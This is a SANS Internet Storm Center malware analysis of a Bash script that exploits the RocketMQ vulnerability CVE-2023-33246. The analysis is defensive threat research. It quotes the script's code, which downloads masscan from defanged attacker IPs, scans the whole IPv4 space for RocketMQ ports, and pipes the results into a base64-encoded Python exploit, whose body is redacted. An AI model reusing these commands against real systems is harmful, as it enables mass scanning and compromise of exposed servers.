A few months ago, RocketMQ[1], a real-time message queue platform, suffered of a nasty vulnerability referred as %%cve:2023-33246%%. I found another malicious script in the wild a few weeks ago that exploits this vulnerability. It has still today a very low VirusTotal detection score:2/60 [2] (SHA256:70710c630390dbf74a97162ab61aae78d3e18eacb41e16d3dd6bbd872fee66c5).
This script is a Bash script has two main parts: First, it will prepare its environment by creating a random directory:
rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ”); if [ -z ${rand} ]; then rand=’.tmp’; fi
echo “${rand}” > “$(pwd)/.${rand}” 2>/dev/null && LPATH=”$(pwd)/.cache/”; ${rm} -f “$(pwd)/.${rand}” >/dev/null 2>&1
echo “${rand}” > “/tmp/.${rand}” 2>/dev/null && LPATH=”/tmp/.cache/”; ${rm} -f “/tmp/.${rand}” >/dev/null 2>&1
echo “${rand}” > “/usr/local/bin/.${rand}” 2>/dev/null && LPATH=”/usr/local/bin/.cache/”; ${rm} -f “/usr/local/bin/.${rand}” >/dev/null 2>&1
echo “${rand}” > “${HOME}/.${rand}” 2>/dev/null && LPATH=”${HOME}/.cache/”; ${rm} -f “${HOME}/.${rand}” >/dev/null 2>&1
mkdir -p ${LPATH} >/dev/null 2>&1
Then, it will install some dependencies using yum or apt. The dependencies will allow the tool to download and compile on the fly a copy of the masscan[3] port scanner:
if [ ! -d ${LPATH}masscan ]; then
echo “Downloading masscan.tar.gz..”
wget -qO ${LPATH}masscan.tar.gz hxxp://149[.]28[.]85[.]17:80/wp-content/themes/twentyseventeen/masscan.tar.gz
tar -C ${LPATH} -zxf ${LPATH}masscan.tar.gz
rm ${LPATH}masscan.tar.gz
make clean -C ${LPATH}masscan >/dev/null 2>&1
make -C ${LPATH}masscan >/dev/null 2>&1
masscan=${LPATH}masscan/bin/masscan
elif [ -f ${LPATH}masscan/bin/masscan ]; then
echo “Masscan existed already in ${LPATH}”
masscan=${LPATH}masscan/bin/masscan
else
if [ ! -f ${LPATH}.masscan ]; then
curl –retry 5 -sLk hxxp://203[.]55[.]135[.]12/wp-content/themes/twentyfifteen/masscan -o ${LPATH}.masscan
chmod 755 ${LPATH}.masscan
masscan=${LPATH}.masscan
fi
if [[ “” == “${masscan}” ]]; then
exit
fi
fi
Masscan is very powerfull to quickly scan the complete IPv4 address space for a specific port. That’s what the script does. It scan the Internet and searches for the following open ports: 10911,10909. These are used by RocketMQ. The masscan results will be passed to a Python script using a pipe:
${sudo} ${masscan} –shard 17/20 –rate 30000 –exclude-range 255.255.255.255 -p10911,10909 0.0.0.0/0 | python3 -c “import base64;exec(base64.b64decode(‘…redatcted…’))”
The Python script has been redacted but, for every IP reported by masscan, it starts a thread to try to exploit the server.
Something funny I found in the Python script: The attacker reused (or forked) the code because it also contains other exploits:
remnux@remnux:/MalwareZoo/20231216$ grep module_ payload.py
def ZZZZmodule_scan_bigip(self, ip, port):
def ZZZZmodule_scan_webmin(self, ip, port):
def module_scan_rocketmq(self, ip, port):
def ZZZmodule_scan_wordpress(self, ip, port):
def ZZZZmodule_scan_webuzo(self, ip, port):
The one starting with “ZZZ” have been disabled.
[1] https://rocketmq.apache.org
[2] https://www.virustotal.com/gui/file/70710c630390dbf74a97162ab61aae78d3e18eacb41e16d3dd6bbd872fee66c5/detection
[3] https://github.com/robertdavidgraham/masscan
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.